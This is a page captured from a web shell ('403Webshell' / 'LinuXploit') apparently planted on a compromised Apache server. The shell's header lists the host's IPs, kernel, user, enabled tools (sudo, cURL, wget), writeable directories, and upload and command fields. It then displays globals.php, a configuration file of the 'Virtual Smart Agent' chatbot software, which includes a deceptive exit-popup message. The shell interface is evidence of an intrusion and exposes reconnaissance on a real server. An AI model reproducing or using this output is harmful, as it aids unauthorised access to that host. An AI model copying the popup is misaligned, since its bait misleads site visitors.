403Webshell
Server IP : 10.200.247.200  /  Your IP : 216.73.217.19
Web Server : Apache
System : Linux synergy-usa-sites 6.8.0-138-generic #138-Ubuntu SMP PREEMPT_DYNAMIC Fri Jul 31 22:41:49 UTC 2026 x86_64
User : jeremy ( 1001)
PHP Version : 8.4.25
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/usa_sites/usafundingapplications.org/vsa/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/usa_sites/usafundingapplications.org/vsa/globals.php
<?php
/*
Copyright (c) 2007-present InnAnTech Industries
Author: Dave Guindon
Web: www.VirtualSmartAgent.com
Support: www.DaveGuindonSupport.com

Please send bug reports, suggestions and/or feedback to the support
website given above.

Virtual Smart Agent is a commercial software. Any distribution is strictly prohibited
unless a resale rights license was delivered along with this software.
*/

//manually and completely remove news
$shownews = true; //change this to $shownews = false; if you want to completely remove the news from the home section

//the virtual smart agent clickbank nickname
//$vsacbnick = 'vsagent';

//current server time
$serverdatetime = date('D-M-j-Y h:i:s a T');

//this is the current software version
$version = '1.1.7';

//some required urls for the system
$blogfeed = 'http://www.virtualsmartagent.com/blog/feed/';
$bloglink = 'http://www.virtualsmartagent.com/blog/';
$helplink = 'http://www.virtualsmartagent.com/help/index.php';
$affsignup = 'http://www.virtualsmartagent.com/ida/signup.php';
$affpage = 'http://www.virtualsmartagent.com/affiliates.php';

$headerimg = '<img src="images/header.jpg" width="500" height="80" />';

if ($_SESSION['testmode'] == 1){
  $themode = '<br />&nbsp;<font color="#FF0000"><strong>This campaign is currently in TEST mode</strong></font>';
}else{
  $themode = '';
}

//control panel menu
$menu = '<table width="100%" border="0" cellspacing="0" cellpadding="0"><tr><td width="100">'.$headerimg.'</td><td align="right" valign="top"><font color="#999999">Server time: '.$serverdatetime.'</font></td></tr>
<tr>
<td>
&nbsp;<font color="#999999"><strong>Installed Version:</strong> '.$version.'</font><br />
&nbsp;<font color="#999999"><strong>Selected Campaign:</strong> '.$_SESSION['campaignlabel'].'</font>
'.$themode.'		  
</td>
</tr>
</table><br />
<DIV class=menu>
<A href="index.php">Home</A>
<A href="reports.php">Stats</A>
<A href="chatwindow.php">Display</A>
<A href="agents.php">Agents</A>
<A href="messages.php">Messages</A>
<A href="linksettings.php">Links</A>
<A href="chats.php">Chats</A>
<A href="unanswered.php">Unanswered</A>
<A href="settings.php">System</A>
<A href="'.$helplink.'" target="_blank">Help</A>
</DIV>';

$topheader = '<table width="100%" border="0" cellpadding="0" cellspacing="0"><tr><td>'.$headerimg.'</td></tr></table>';

//variables
$copyright = '<span style="text-align:center; font-size: 12px">Copyright &copy; '.date('Y').', VirtualSmartAgent.com of Innantech Industries by <a href="http://www.daveguindon.info" target="_blank">Dave Guindon</a></span>';
$bottomlinks = '<br /><br /><span style="text-align:center; font-size: 12px">
<a href="http://www.virtualsmartagent.com/affiliates.php" target="_blank">Earn Cash</a> | 
<a href="http://www.virtualsmartagent.com/resources.php" target="_blank">Resources</a> | 
<a href="'.$helplink.'" target="_blank">Help Videos</a> | 
<a href="http://www.virtualsmartagent.com/version.php?v='.$version.'" target="_blank">Check Version</a> | 
<a href="logout.php">Logout</a></span>';

//colors
$orange = 'FF9900';
$pink = 'FF00FF';
$blue = '0099FF';
$red = 'CC0000';
$green = '009900';
$darkpurple = '43498b';
$lightblue = 'f6f9fa';
$white = 'FFFFFF';
$lightgrey = 'dadada';
$orange2 = 'ff9900';
$lightpurple = 'ccccff';
$grey = '999999';
$black = '000000';

//used for tables and other visuals
$headercolor = $darkpurple;
$tablebgcolor = $lightgrey;
$row2color = $lightblue;
$sectioncolor = $lightpurple;

//thickbox
$thickboxfiles = '<script type="text/javascript">var tb_pathToImage="'.$_SESSION['install'].'thickbox/loadingAnimation.gif";</script> ';
$thickboxfiles .= '<script type="text/javascript" src="thickbox/jquery.js"></script> ';
$thickboxfiles .= '<script type="text/javascript" src="thickbox/thickbox.js"></script>';
$thickboxfiles .= '<link rel="stylesheet" href="thickbox/thickbox.css" type="text/css" media="screen" />';

$cbottom = '<p>&nbsp;</p><p>&nbsp;</p>';

//system defined codes used in chat messages
$systemcodes['agentname']=array('%%AGENTNAME%%','Agent Name');
$systemcodes['date1']=array('%%DATE1%%','l F j, Y');
$systemcodes['date2']=array('%%DATE2%%','D M j, Y');
$systemcodes['date3']=array('%%DATE3%%','M j, Y');
$systemcodes['date4']=array('%%DATE4%%','d/m/Y');
$systemcodes['visitorname']=array('%%VISITORNAME%%','Visitor Name');

//the default exit alert message
$exitmessage =  '>>>>>>>>>>>>>> WAIT WAIT WAIT <<<<<<<<<<<<<<<\n\n';
$exitmessage .= 'A virtual agent would like to talk to you about\n';
$exitmessage .= 'a special *OFFER*. Simply click the (Cancel)\n';
$exitmessage .= 'button to get your special offer!';

$defaultErrorMessage = 'Sorry but I cannot find an answer to your question. Please rephrase your question.';

//the self-cleaning variables
$doselfclean = '1';
$selfcleanperiod = 5*24*60*60; //5 days in seconds

//these are the default text for the built-in aweber subscription form
$aweber_nametext = 'your name'; 
$aweber_emailtext = 'your@email.com';

//the default auto thank you email advertisment
$aesubject = 'Thanks for chatting with me today ...';
$aemessage = 'Hi again %%VISITORNAME%%,\n';
$aemessage .= '\n';
$aemessage .= 'This is %%AGENTNAME%%, the virtual smart agent from %%SITENAME%%.\n';
$aemessage .= 'I just wanted to say thank you for your kind interest in our website.\n';
$aemessage .= '\n';
$aemessage .= 'Also, as I mentioned in the chat, I am not a real person but a virtual\n';
$aemessage .= 'smart agent that has been trained to intelligently answer website visitor\n';
$aemessage .= 'questions.\n';
$aemessage .= '\n';
$aemessage .= 'If you would like a virtual smart agent just like me working for you on\n';
$aemessage .= 'your website 24/7 365 days a year ... then jump on over to the following\n';
$aemessage .= 'website for more information: %%AFFILIATELINK%%\n';
$aemessage .= '\n';
$aemessage .= 'Thanks again for your kind interest and all the best,\n';
$aemessage .= '\n';
$aemessage .= '%%AGENTNAME%%\n';
$aemessage .= '%%SITENAME%%\n\n';

//replacement codes for the auto thank you email
$aecodes[0] = '%%AGENTNAME%%';
$aecodes[1] = '%%VISITORNAME%%';
$aecodes[2] = '%%VISITOREMAIL%%';
$aecodes[3] = '%%AFFILIATELINK%%';
$aecodes[4] = '%%SITENAME%%';
$aecodes[5] = '%%IPADDRESS%%';

?>

Youez - 2016 - github.com/yon3zu
LinuXploit